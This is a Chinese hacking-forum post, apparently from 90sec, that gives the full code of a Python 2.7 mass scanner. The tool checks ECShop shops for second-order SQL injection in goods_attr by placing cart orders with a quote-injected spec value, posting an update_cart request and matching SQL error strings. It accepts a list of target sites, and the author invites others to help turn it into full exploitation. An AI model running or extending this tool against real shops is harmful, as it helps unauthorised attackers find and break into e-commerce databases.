介于好久没法帖子了,看到ecshop的goods_attr和goods_attr_id两个二次注入漏洞 ,于是写了这个小工具,由于不会构造语句,只能写出判断漏洞是否存在的工具了,大家海涵,有能构造出语句的,联系我,我再完善一下,
完整代码如下:
#! /usr/bin/env python2.7
#coding=utf-8
#by 少校 QQ1006079161 写入2013年8月14号深夜
#ecshop的goods_attr和goods_attr_id两个二次注入漏洞
#参考[url]https://forum.90sec.org/viewthread.php?tid=6476&highlight=ecshop[/url]
import re
import sys
import getopt
import urllib
import urllib2
import cookielib
def make_order(arg):
print u'n当前正在检测%s' % arg
global mdbhack
run = True
mdbhack = 1
url = '%s/flow.php?step=add_to_cart' % arg
while run and mdbhack<25:#为了效率期间只测试前25个id,可自行增加
data = '''goods={"quick":1,"spec":["163","163'"],"goods_id":%s,"number":"1","parent":0}''' % mdbhack
cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
urllib2.install_opener(urlOpener) #使用isntall_opener后调用urlopen时会使用这个opener so is good
try:
httpres = urlOpener.open(url,data,timeout=5)
html = httpres.read()
order_ok = re.search('s1s',html)
if order_ok:
print u'[LOG] 自动完成订购订单!'
goods_attr_sqlinjection(arg)
run = False
break
else:
print u'[LOG] 自动订购产品id%s失败!' % mdbhack
mdbhack += 1
if mdbhack == 25 and run:
print u'[LOG] 抱歉,前25个id的产品全部订购失败,请手动检测吧!'
except Exception,e:
print e
run = False
break
def goods_attr_sqlinjection(arg):
url = arg+'/flow.php'
html = urllib2.urlopen(url).read()
good_numbers = re.findall('''name="goods_number[(.*?)]"''',html)[0]#构造good_numbers
if good_numbers:
data = 'goods_number%5B'+str(good_numbers)+'''%5D=1&submit=%B8%FC%D0%C2%B9%BA%CE%EF%B3%B5&step=update_cart'''
request = urllib2.Request(url,data)
httpres = urllib2.urlopen(request,timeout=10)
html = httpres.read()
if re.search('server error|report:Array|You have an error|your SQL syntax|the right syntax to use near',html):
print u'[LOG] 恭喜您存在goods_attr注入漏洞!'
else:
print u'[LOG] 不存在此漏洞'
def main(url,file_txt):
if url and file_txt:
printerror()
sys.exit(1)
if url:
make_order(url.strip())
if file_txt:
try:
for url in open(file_txt,'r'):
make_order(url.strip())
except Exception,e:
print e
sys.exit(1)
def printerror():
print '''
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O ..
`+---------------------------^----------|
`_,-------, [email]__1006079161@QQ.com______[/email]|
/ XXXXXX /`| /
/ XXXXXX / ` /
/ XXXXXX /______(
/ XXXXXX /
/ XXXXXX /
(________( For example:
`------' scan.py -u [url]http://www.mdbhack.com[/url]
scan.py -f ecshop.txt
'''
if __name__ == '__main__':
url = None
file_txt = None
if len (sys.argv) == 3:
try:
opts, args = getopt.getopt (sys.argv[1:], "u:f:")#Assigning Parameters
except:
printerror()
sys.exit(1)
else:
printerror()
sys.exit(1)
for opt,arg in opts:#Traversal
if opt == '-u':
url = arg
elif opt == '-f':
file_txt = arg
main(url,file_txt)
作者:少校 90sec
评论 (0)